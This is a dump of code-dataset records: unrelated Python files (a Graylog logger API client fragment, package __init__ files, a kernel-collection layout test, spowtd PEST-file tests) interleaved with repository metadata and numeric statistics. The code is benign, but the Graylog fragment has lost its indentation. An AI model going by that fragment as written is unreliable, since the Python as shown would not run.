return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def subsystems(self, **kwargs):
"""
List all logger subsystems and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.subsystems(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.subsystems_with_http_info(**kwargs)
else:
(data) = self.subsystems_with_http_info(**kwargs)
return data
def subsystems_with_http_info(self, **kwargs):
"""
List all logger subsystems and their current levels
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.subsystems_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Map
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method subsystems" % key
)
params[key] = val
del params['kwargs']
resource_path = '/cluster/system/loggers/subsystems'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Map',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
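# A minimal usage sketch for the generated client above (hypothetical server
# configuration; the ApiClient import path is assumed from this package's layout):
#   from graylog.api_client import ApiClient
#   api = ClustersystemloggersApi(ApiClient())
#   levels = api.loggers()  # synchronous call, returns a Map
#   api.set_subsystem_logger_level('node-1', 'graylog', 'DEBUG')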
| 38.217033
| 123
| 0.569837
| 1,448
| 13,911
| 5.28384
| 0.145028
| 0.062737
| 0.020389
| 0.028232
| 0.827866
| 0.79885
| 0.789962
| 0.747484
| 0.728663
| 0.728663
| 0
| 0.001662
| 0.351089
| 13,911
| 363
| 124
| 38.322314
| 0.845907
| 0.357127
| 0
| 0.680982
| 1
| 0
| 0.14547
| 0.054007
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042945
| false
| 0
| 0.042945
| 0
| 0.147239
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3ede58eb2cb8c078252b9167e16c6a9ada9789d
| 152
|
py
|
Python
|
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | null | null | null |
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | 4
|
2021-06-24T18:41:56.000Z
|
2021-07-24T18:13:44.000Z
|
src/jbhannah/infrastructure/click/__init__.py
|
jbhannah/infrastructure
|
63f473b1d2b76d28bfa76ecf444dc49c3c59df47
|
[
"MIT"
] | null | null | null |
from .group import command, group, proxy_command
from .verbose import verbose_option
__all__ = ["command", "group", "proxy_command", "verbose_option"]
| 30.4
| 65
| 0.769737
| 19
| 152
| 5.736842
| 0.421053
| 0.220183
| 0.311927
| 0.440367
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111842
| 152
| 4
| 66
| 38
| 0.807407
| 0
| 0
| 0
| 0
| 0
| 0.256579
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
430e9ba42fbfc95731396b2c8d7ece71b1216e75
| 6,668
|
py
|
Python
|
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
ZZZ_OtherDemo/00-dyld-832.7.3/testing/kernel-cache-tests/auxkc-no-split-seg/test.py
|
1079278593/TreasureChest
|
8b1ebe04ed7c2ed399c4ecf3b75b3fee0a1aced8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python2.7
import os
import KernelCollection
# Verify that we can build an auxKC from third-party kexts without split seg
def check(kernel_cache):
# First build a kernel collection
kernel_cache.buildKernelCollection("x86_64", "/auxkc-no-split-seg/main.kc", "/auxkc-no-split-seg/main.kernel", "/auxkc-no-split-seg/extensions", [], [])
kernel_cache.analyze("/auxkc-no-split-seg/main.kc", ["-layout", "-arch", "x86_64"])
assert len(kernel_cache.dictionary()["cache-segments"]) == 6
assert kernel_cache.dictionary()["cache-segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["cache-segments"][0]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][1]["name"] == "__PRELINK_TEXT"
assert kernel_cache.dictionary()["cache-segments"][1]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["cache-segments"][2]["name"] == "__TEXT_EXEC"
assert kernel_cache.dictionary()["cache-segments"][2]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__PRELINK_INFO"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x10000"
assert kernel_cache.dictionary()["cache-segments"][4]["name"] == "__HIB"
assert kernel_cache.dictionary()["cache-segments"][4]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["cache-segments"][5]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["cache-segments"][5]["vmAddr"] == "0x14000"
assert len(kernel_cache.dictionary()["dylibs"]) == 1
# main.kernel
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.kernel"
assert len(kernel_cache.dictionary()["dylibs"][0]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["vmAddr"] == "0xC000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["name"] == "__HIB"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["vmAddr"] == "0x14000"
# Now build an aux cache using the baseline kernel collection
kernel_cache.buildAuxKernelCollection("x86_64", "/auxkc-no-split-seg/aux.kc", "/auxkc-no-split-seg/main.kc", "", "/auxkc-no-split-seg/extensions", ["com.apple.foo", "com.apple.bar"], [])
kernel_cache.analyze("/auxkc-no-split-seg/aux.kc", ["-layout", "-arch", "x86_64"])
assert len(kernel_cache.dictionary()["cache-segments"]) == 8
assert kernel_cache.dictionary()["cache-segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["cache-segments"][0]["vmAddr"] == "0x4000"
assert kernel_cache.dictionary()["cache-segments"][1]["name"] == "__PRELINK_TEXT"
assert kernel_cache.dictionary()["cache-segments"][1]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][2]["name"] == "__PRELINK_INFO"
assert kernel_cache.dictionary()["cache-segments"][2]["vmAddr"] == "0x0"
assert kernel_cache.dictionary()["cache-segments"][3]["name"] == "__REGION0"
assert kernel_cache.dictionary()["cache-segments"][3]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["cache-segments"][4]["name"] == "__REGION1"
assert kernel_cache.dictionary()["cache-segments"][4]["vmAddr"] == "0x9000"
assert kernel_cache.dictionary()["cache-segments"][5]["name"] == "__REGION2"
assert kernel_cache.dictionary()["cache-segments"][5]["vmAddr"] == "0xA000"
assert kernel_cache.dictionary()["cache-segments"][6]["name"] == "__REGION3"
assert kernel_cache.dictionary()["cache-segments"][6]["vmAddr"] == "0xB000"
assert kernel_cache.dictionary()["cache-segments"][7]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["cache-segments"][7]["vmAddr"] == "0xC000"
assert len(kernel_cache.dictionary()["dylibs"]) == 2
# bar.kext
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.bar"
assert len(kernel_cache.dictionary()["dylibs"][0]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][0]["vmAddr"] == "0x8000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["name"] == "__DATA"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][1]["vmAddr"] == "0x9000"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][0]["segments"][2]["vmAddr"] == "0xC000"
# foo.kext
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.foo"
assert len(kernel_cache.dictionary()["dylibs"][1]["segments"]) == 3
assert kernel_cache.dictionary()["dylibs"][1]["segments"][0]["name"] == "__TEXT"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][0]["vmAddr"] == "0xA000"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][1]["name"] == "__DATA"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][1]["vmAddr"] == "0xB000"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][2]["name"] == "__LINKEDIT"
assert kernel_cache.dictionary()["dylibs"][1]["segments"][2]["vmAddr"] == "0xC000"
# Check the fixups
kernel_cache.analyze("/auxkc-no-split-seg/aux.kc", ["-fixups", "-arch", "x86_64"])
assert kernel_cache.dictionary()["fixups"] == ""
assert len(kernel_cache.dictionary()["dylibs"]) == 2
# bar.kext
assert kernel_cache.dictionary()["dylibs"][0]["name"] == "com.apple.bar"
assert len(kernel_cache.dictionary()["dylibs"][0]["fixups"]) == 1
assert kernel_cache.dictionary()["dylibs"][0]["fixups"]["0x5008"] == "kc(3) + 0x9000"
# foo.kext
assert kernel_cache.dictionary()["dylibs"][1]["name"] == "com.apple.foo"
assert len(kernel_cache.dictionary()["dylibs"][1]["fixups"]) == 1
assert kernel_cache.dictionary()["dylibs"][1]["fixups"]["0x5008"] == "kc(3) + 0xB000"
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-static -mkernel -nostdlib -Wl,-add_split_seg_info -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text -Wl,-e,__start -Wl,-pagezero_size,0x0 -Wl,-pie main.c -o main.kernel -Wl,-install_name,/usr/lib/swift/split.seg.v2.hack -Wl,-segprot,__HIB,r-x,r-x -Wl,-image_base,0x8000 -Wl,-segaddr,__HIB,0x4000
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-kext -mkernel -nostdlib foo.c -o extensions/foo.kext/foo
# [~]> xcrun -sdk macosx.internal cc -arch x86_64 -Wl,-kext -mkernel -nostdlib bar.c -o extensions/bar.kext/bar
| 68.040816
| 353
| 0.669016
| 842
| 6,668
| 5.118765
| 0.137767
| 0.178654
| 0.311833
| 0.338283
| 0.824362
| 0.816241
| 0.787239
| 0.721578
| 0.515545
| 0.372854
| 0
| 0.044142
| 0.106479
| 6,668
| 97
| 354
| 68.742268
| 0.679255
| 0.123575
| 0
| 0.222222
| 0
| 0
| 0.318868
| 0.042882
| 0
| 0
| 0.027787
| 0
| 0.888889
| 1
| 0.013889
| false
| 0
| 0.027778
| 0
| 0.041667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a3192e8d21b95aa21261ce543fdc902bb110549
| 173
|
py
|
Python
|
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | 4
|
2018-07-04T17:20:12.000Z
|
2019-07-14T18:07:25.000Z
|
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | null | null | null |
bottleneck/slow/__init__.py
|
odidev/bottleneck
|
bcfdfa8b1ee6787ca396146a55d969ddbbf62da5
|
[
"BSD-2-Clause"
] | 1
|
2018-09-03T03:02:06.000Z
|
2018-09-03T03:02:06.000Z
|
# flake8: noqa
from bottleneck.slow.reduce import *
from bottleneck.slow.nonreduce import *
from bottleneck.slow.nonreduce_axis import *
from bottleneck.slow.move import *
| 24.714286
| 44
| 0.803468
| 23
| 173
| 6
| 0.434783
| 0.405797
| 0.521739
| 0.521739
| 0.478261
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006536
| 0.115607
| 173
| 6
| 45
| 28.833333
| 0.895425
| 0.069364
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
434e060bf7cbd5b268f2b6d721e94ff794828b33
| 96
|
py
|
Python
|
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
zeppos_code_gen/hello_world.py
|
changrunner/zeppos_code_gen
|
0a29d7b394a19a217fe43e60c6e0204966ade97a
|
[
"Apache-2.0"
] | null | null | null |
class HelloWorld:
@staticmethod
def get_hello_world():
return "Hello World"
| 19.2
| 29
| 0.635417
| 10
| 96
| 5.9
| 0.8
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.291667
| 96
| 4
| 30
| 24
| 0.867647
| 0
| 0
| 0
| 0
| 0
| 0.119565
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
4359c77027a0e3563a48ca3c9f004c79cfd4f120
| 229
|
py
|
Python
|
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | null | null | null |
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | 1
|
2022-03-08T14:54:26.000Z
|
2022-03-08T15:02:52.000Z
|
gryphon/wizard/questions/__init__.py
|
vittorfp/labskit_cli
|
28e109b4a9f36a03d499eb953e04a4fb787632fe
|
[
"MIT"
] | null | null | null |
from .add_questions import AddQuestions
from .init_questions import InitQuestions
from .generate_questions import GenerateQuestions
from .common_questions import CommonQuestions
from .settings_questions import SettingsQuestions
| 32.714286
| 49
| 0.886463
| 25
| 229
| 7.92
| 0.52
| 0.378788
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091703
| 229
| 6
| 50
| 38.166667
| 0.951923
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43b9ee94611b25269011c1e467d8fd1f9ba35db7
| 83
|
py
|
Python
|
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | 1
|
2017-07-17T02:08:08.000Z
|
2017-07-17T02:08:08.000Z
|
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | null | null | null |
sleepi/__init__.py
|
mechatrax/python-sleepi
|
a1037e2e686ec8926fec0c4d889765bde3bfa355
|
[
"MIT"
] | 3
|
2017-04-14T03:32:53.000Z
|
2022-02-21T02:46:49.000Z
|
from .sleepi import Sleepi
from .sleepi import Sleepi2
from .sleepi import Sleepi3
| 20.75
| 27
| 0.819277
| 12
| 83
| 5.666667
| 0.416667
| 0.441176
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028169
| 0.144578
| 83
| 3
| 28
| 27.666667
| 0.929577
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
43c7710f0ed8281073a19e86f5e849b449ac6f88
| 187
|
py
|
Python
|
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/RemoveUnicodePrefixFromGluedStringNodesInParenthesis.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2020-11-27T10:36:50.000Z
|
2020-11-27T10:36:50.000Z
|
s = (<error descr="Python version 3.2 does not support a 'U' prefix">u<caret></error>"string \n"
<error descr="Python version 3.2 does not support a 'U' prefix">u</error>"next line"
)
| 62.333333
| 96
| 0.679144
| 34
| 187
| 3.735294
| 0.529412
| 0.15748
| 0.251969
| 0.362205
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0.755906
| 0
| 0.025157
| 0.149733
| 187
| 3
| 97
| 62.333333
| 0.773585
| 0
| 0
| 0
| 0
| 0
| 0.606383
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
6007ddb63d2d3bcb27c98533050a34d9e416799f
| 156
|
py
|
Python
|
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | null | null | null |
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | 1
|
2017-09-19T17:06:49.000Z
|
2017-09-19T17:06:49.000Z
|
wtl/wtparser/tests/parsers/__init__.py
|
elegion/djangodash2013
|
3814123f9bff213a5d74db05db3caa83caea731c
|
[
"MIT"
] | null | null | null |
from wtl.wtparser.tests.parsers.gemfile import *
from wtl.wtparser.tests.parsers.podfile import *
from wtl.wtparser.tests.parsers.requirements_txt import *
| 39
| 57
| 0.826923
| 22
| 156
| 5.818182
| 0.454545
| 0.164063
| 0.351563
| 0.46875
| 0.726563
| 0.515625
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076923
| 156
| 3
| 58
| 52
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
60790fc85f486e526b6e5ce5e5bb49f80d9d7293
| 9,569
|
py
|
Python
|
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | null | null | null |
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | null | null | null |
spowtd/test/test_pestfiles.py
|
alex-cobb/python-spowtd
|
b841ce63a4ed168a6e1b4e17b689d8be9dc11318
|
[
"BSD-2-Clause"
] | 2
|
2021-10-14T14:38:43.000Z
|
2022-03-21T16:21:06.000Z
|
"""Test code for generating PEST files
"""
import io
import pytest
import spowtd.pestfiles as pestfiles_mod
import spowtd.recession as recession_mod
import spowtd.rise as rise_mod
from spowtd.test import conftest
reference_text = {
('rise', 'tpl', 'peatclsm'): """ptf @
specific_yield:
type: peatclsm
sd: @sd @
theta_s: @theta_s @
b: @b @
psi_s: @psi_s @
transmissivity:
type: peatclsm
Ksmacz0: 7.3 # m/s
alpha: 3 # dimensionless
zeta_max_cm: 1.0""",
('rise', 'tpl', 'spline'): """ptf @
specific_yield:
type: spline
zeta_knots_mm:
- -291.7
- -183.1
- -15.74
- 10.65
- 38.78
- 168.3
sy_knots: # Specific yield, dimensionless
- @s1 @
- @s2 @
- @s3 @
- @s4 @
- @s5 @
- @s6 @
transmissivity:
type: spline
zeta_knots_mm:
- -291.7
- -5.167
- 168.3
- 1000
K_knots_km_d: # Conductivity, km /d
- 0.005356
- 1.002
- 6577.0
- 8430.0
minimum_transmissivity_m2_d: 7.442 # Minimum transmissivity, m2 /d""",
('curves', 'tpl', 'peatclsm'): """ptf @
specific_yield:
type: peatclsm
sd: @sd @
theta_s: @theta_s @
b: @b @
psi_s: @psi_s @
transmissivity:
type: peatclsm
Ksmacz0: @Ksmacz0 @ # m/s
alpha: @alpha @ # dimensionless
zeta_max_cm: 1.0""",
('curves', 'tpl', 'spline'): """ptf @
specific_yield:
type: spline
zeta_knots_mm:
- -291.7
- -183.1
- -15.74
- 10.65
- 38.78
- 168.3
sy_knots: # Specific yield, dimensionless
- @s1 @
- @s2 @
- @s3 @
- @s4 @
- @s5 @
- @s6 @
transmissivity:
type: spline
zeta_knots_mm:
- -291.7
- -5.167
- 168.3
- 1000
K_knots_km_d: # Conductivity, km /d
- @K_knot_1 @
- @K_knot_2 @
- @K_knot_3 @
- @K_knot_4 @
minimum_transmissivity_m2_d: @T_min @ # Minimum transmissivity, m2 /d"""}
# A way of identifying the sample:
# mapping from number of distinct zetas to sample number
SAMPLE_NUMBER = {141: 1,
204: 2}
@pytest.mark.parametrize(
('parameterization', 'reference_file_contents'),
[('peatclsm', reference_text[('rise', 'tpl', 'peatclsm')]),
('spline', reference_text[('rise', 'tpl', 'spline')])])
def test_generate_rise_tpl(classified_connection,
parameterization,
reference_file_contents):
"""Generation of template files for rise curve calibration
"""
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='tpl',
configuration_file=None,
outfile=outfile)
assert (outfile.getvalue().splitlines() ==
reference_file_contents.splitlines())
def test_generate_rise_ins(classified_connection):
"""Generation of instruction files for rise curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
assert n_zeta in SAMPLE_NUMBER
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
# Parameterization doesn't matter for ins file
conftest.get_parameter_file_path('peatclsm'),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='ins',
configuration_file=None,
outfile=outfile)
with open(
conftest.get_sample_file_path('rise_calibration',
sample,
'ins'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize('parameterization',
['peatclsm', 'spline'])
def test_generate_rise_pst(classified_connection,
parameterization):
"""Generation of control files for rise curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_rise_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='pst',
configuration_file=None,
outfile=outfile,
precision=5)
with open(
conftest.get_sample_file_path(
'{}_rise_calibration'.format(parameterization),
sample,
'pst'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize(
('parameterization', 'reference_file_contents'),
[('peatclsm', reference_text[('curves', 'tpl', 'peatclsm')]),
('spline', reference_text[('curves', 'tpl', 'spline')])])
def test_generate_curves_tpl(classified_connection,
parameterization,
reference_file_contents):
"""Generation of template files for master curves calibration
"""
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='tpl',
configuration_file=None,
outfile=outfile)
assert (outfile.getvalue().splitlines() ==
reference_file_contents.splitlines())
def test_generate_curves_ins(classified_connection):
"""Generation of instruction files for master curves calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
recession_mod.find_recession_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_zeta = cursor.fetchone()[0]
cursor.close()
assert n_zeta in SAMPLE_NUMBER
sample = SAMPLE_NUMBER[n_zeta]
outfile = io.StringIO()
with open(
# Parameterization doesn't matter for ins file
conftest.get_parameter_file_path('peatclsm'),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='ins',
configuration_file=None,
outfile=outfile)
with open(
conftest.get_sample_file_path('curves_calibration',
sample,
'ins'),
'rt') as ref_file:
assert (outfile.getvalue().splitlines() ==
ref_file.read().splitlines())
@pytest.mark.parametrize('parameterization',
['peatclsm', 'spline'])
def test_generate_curves_pst(classified_connection,
parameterization):
"""Generation of control files for curves curve calibration
"""
# XXX Use a fixture
rise_mod.find_rise_offsets(
classified_connection)
recession_mod.find_recession_offsets(
classified_connection)
cursor = classified_connection.cursor()
cursor.execute("""
SELECT count(distinct zeta_number)
FROM rising_interval_zeta""")
n_rise_zeta = cursor.fetchone()[0]
cursor.execute("""
SELECT count(distinct zeta_number)
FROM recession_interval_zeta""")
n_recession_zeta = cursor.fetchone()[0]
cursor.close()
sample = SAMPLE_NUMBER[n_rise_zeta]
outfile = io.StringIO()
with open(
conftest.get_parameter_file_path(parameterization),
'rt') as parameter_file:
pestfiles_mod.generate_curves_pestfiles(
classified_connection,
parameter_file=parameter_file,
outfile_type='pst',
configuration_file=None,
outfile=outfile,
precision=5)
with open(
conftest.get_sample_file_path(
'{}_curves_calibration'.format(parameterization),
sample,
'pst'),
